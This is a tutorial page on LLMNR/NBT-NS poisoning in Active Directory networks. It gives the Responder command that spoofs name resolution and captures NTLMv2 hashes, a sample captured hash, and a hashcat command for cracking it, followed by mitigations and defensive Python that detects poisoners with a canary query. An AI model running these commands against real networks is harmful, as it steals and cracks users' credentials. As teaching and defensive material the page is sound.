# LLMNR Poisoning Attack

### Overview

Link-Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link. It resolves a hostname to an IP address by multicasting a query across the link and asking every listening network interface to reply if it is authoritative for the hostname in the query.

In a network, when a machine tries to resolve a particular host and DNS fails to do so, the machine falls back to LLMNR and asks the other machines on the link whether any of them knows that host. If LLMNR also fails, it falls back to NBT-NS.

In Active Directory environments LLMNR is usually left enabled and is widely used, but relying on it for host resolution has a severe security impact: any host on the local link can answer the query, and the answer is accepted without verification.

### Prerequisites for Attack

1. Attacker Must Be on the Same Local Network
2. LLMNR and/or NBT-NS Must Be Enabled
3. Victim Must Attempt to Resolve a Non-Existent Host
4. NTLM Authentication Must Be Allowed
5. SMB / HTTP / LDAP authentication must be triggered. Responder only captures credentials if the victim tries to authenticate to **something.**

### Steps

1. Start Responder. It listens for LLMNR queries, answers them with its own address, and acts as the SMB, HTTP, LDAP, etc. server that the victim then connects to.

   ```bash
   sudo responder -I eth0 -dwP
   ```
2. On the **Windows victim**, access a **non-existent share** (e.g. `\\share1`).
3. On the attacker machine, you’ll see output like:

   ```
   [SMB] NTLMv2-SSP Hash     : user::DOMAIN:112233<CHALLENGE>:AABBCC...
   ```
4. Crack the Hash.

   ```bash
   hashcat -m 5600 hashes.txt wordlist.txt
   ```

### Visual Flow

<figure><img src="/files/pvhKhCPhIXQe84JjUJ64" alt=""><figcaption><p>LLMNR Attack Flow with NTLM Authentication</p></figcaption></figure>

### Mitigations

1. Disable LLMNR and NBT-NS.
2. Use strong passwords.
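The packet format from the overview, seen from the defender's side, as an added example that is not from the original page: it builds the query a host multicasts (to 224.0.0.252, UDP port 5355) when DNS fails, parses a response, and flags an answer to a canary name that no real host owns, which is one way to detect a poisoner on the segment. The sample response bytes, the canary name `canary-7f3a` and the address 10.0.0.66 are constructed for illustration.

```python
import socket
import struct

def encode_name(name: str) -> bytes:
    return b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in name.split(".")) + b"\x00"  # DNS labels

def build_llmnr_query(name: str, txid: int) -> bytes:
    """The A-record query a host multicasts after DNS fails: flags=0, QDCOUNT=1, QTYPE=A, QCLASS=IN."""
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", 1, 1)

def decode_name(data: bytes, off: int):
    """Decode labels at off, following a compression pointer; return (name, next_off)."""
    labels, end = [], None
    while True:
        ln = data[off]
        if ln & 0xC0 == 0xC0:                   # pointer (e.g. 0xC00C) back to the question name
            end = end or off + 2
            off = ((ln & 0x3F) << 8) | data[off + 1]
            continue
        off += 1
        if ln == 0:
            break
        labels.append(data[off:off + ln].decode())
        off += ln
    return ".".join(labels), (end if end is not None else off)

def parse_llmnr_response(data: bytes):
    """Return (txid, queried name, [A-record IPs]) from an LLMNR response packet."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    assert flags & 0x8000, "QR bit clear: this is a query, not a response"
    qname, off = decode_name(data, 12)
    ips, off = [], off + 4                      # skip the question's QTYPE and QCLASS
    for _ in range(an):
        _, off = decode_name(data, off)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        if rtype == 1 and rdlen == 4:           # A record: 4 bytes of RDATA after the 10-byte RR header
            ips.append(socket.inet_ntoa(data[off + 10:off + 14]))
        off += 10 + rdlen
    return txid, qname, ips

def is_poisoned(canary: str, txid: int, data: bytes) -> bool:
    """No real host owns the canary name, so any matching answer means something is spoofing it."""
    rtxid, name, ips = parse_llmnr_response(data)
    return rtxid == txid and name.lower() == canary.lower() and bool(ips)

# Constructed sample: a forged answer to "canary-7f3a" claiming 10.0.0.66 (invented values)
SAMPLE_TXID = 0x1A2B
SAMPLE_RESPONSE = (struct.pack("!HHHHHH", SAMPLE_TXID, 0x8000, 1, 1, 0, 0)
                   + encode_name("canary-7f3a") + struct.pack("!HH", 1, 1)
                   + b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 30, 4) + socket.inet_aton("10.0.0.66"))
```

Sending the canary query on a real segment needs a UDP socket joined to the multicast group; any reply to it is worth an alert, since a legitimate host never claims a name that does not exist.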
